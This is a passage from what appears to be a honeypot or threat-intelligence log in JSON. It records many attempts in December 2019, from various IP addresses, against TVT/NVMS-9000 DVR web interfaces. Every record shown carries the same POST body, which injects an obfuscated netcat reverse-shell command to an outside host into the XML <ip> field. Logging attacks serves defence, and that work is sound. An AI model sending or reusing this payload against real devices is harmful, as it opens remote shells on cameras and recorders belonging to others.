- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T23:59:50Z",
- "last_seen": "2019-12-20T23:59:50Z"
- },
- {
- "source_ip_address": "5.187.196.169",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T23:49:13Z",
- "last_seen": "2019-12-20T23:49:13Z"
- },
- {
- "source_ip_address": "213.129.131.242",
- "country": "CZ",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T23:45:23Z",
- "last_seen": "2019-12-20T23:45:23Z"
- },
- {
- "source_ip_address": "114.33.104.21",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-20T23:21:14Z",
- "last_seen": "2019-12-20T23:21:14Z"
- },
- {
- "source_ip_address": "83.220.118.223",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T23:18:12Z",
- "last_seen": "2019-12-20T23:18:12Z"
- },
- {
- "source_ip_address": "173.169.130.80",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T23:07:51Z",
- "last_seen": "2019-12-20T23:07:51Z"
- },
- {
- "source_ip_address": "111.253.111.1",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T23:01:50Z",
- "last_seen": "2019-12-20T23:01:50Z"
- },
- {
- "source_ip_address": "59.126.111.191",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T04:52:57Z",
- "last_seen": "2019-12-20T22:57:43Z"
- },
- {
- "source_ip_address": "79.117.79.124",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T22:53:52Z",
- "last_seen": "2019-12-20T22:53:52Z"
- },
- {
- "source_ip_address": "180.92.156.210",
- "country": "PK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T22:49:53Z",
- "last_seen": "2019-12-20T22:49:53Z"
- },
- {
- "source_ip_address": "189.124.73.24",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T22:47:44Z",
- "last_seen": "2019-12-20T22:47:44Z"
- },
- {
- "source_ip_address": "149.34.21.224",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T22:42:02Z",
- "last_seen": "2019-12-20T22:42:02Z"
- },
- {
- "source_ip_address": "108.191.243.64",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 10,
- "first_seen": "2019-12-20T22:30:14Z",
- "last_seen": "2019-12-20T22:30:14Z"
- },
- {
- "source_ip_address": "187.145.34.23",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T22:25:41Z",
- "last_seen": "2019-12-20T22:25:41Z"
- },
- {
- "source_ip_address": "81.213.108.171",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T22:19:33Z",
- "last_seen": "2019-12-20T22:19:33Z"
- },
- {
- "source_ip_address": "108.41.93.122",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T22:16:36Z",
- "last_seen": "2019-12-20T22:16:36Z"
- },
- {
- "source_ip_address": "189.243.243.182",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 13,
- "first_seen": "2019-12-20T22:00:04Z",
- "last_seen": "2019-12-20T22:00:04Z"
- },
- {
- "source_ip_address": "114.32.168.103",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T21:59:37Z",
- "last_seen": "2019-12-20T21:59:37Z"
- },
- {
- "source_ip_address": "220.134.50.97",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T21:53:01Z",
- "last_seen": "2019-12-20T21:53:01Z"
- },
- {
- "source_ip_address": "195.122.11.96",
- "country": "LV",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T21:46:38Z",
- "last_seen": "2019-12-20T21:46:38Z"
- },
- {
- "source_ip_address": "113.172.150.38",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T21:38:18Z",
- "last_seen": "2019-12-20T21:38:18Z"
- },
- {
- "source_ip_address": "1.161.206.5",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T21:30:36Z",
- "last_seen": "2019-12-20T21:30:36Z"
- },
- {
- "source_ip_address": "5.2.143.125",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T21:11:27Z",
- "last_seen": "2019-12-20T21:11:27Z"
- },
- {
- "source_ip_address": "68.129.124.11",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-20T14:09:12Z",
- "last_seen": "2019-12-20T21:08:55Z"
- },
- {
- "source_ip_address": "66.229.188.61",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T21:04:31Z",
- "last_seen": "2019-12-20T21:04:31Z"
- },
- {
- "source_ip_address": "187.146.238.27",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T20:53:10Z",
- "last_seen": "2019-12-20T20:53:10Z"
- },
- {
- "source_ip_address": "61.70.132.183",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T20:52:28Z",
- "last_seen": "2019-12-20T20:52:28Z"
- },
- {
- "source_ip_address": "220.134.50.97",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
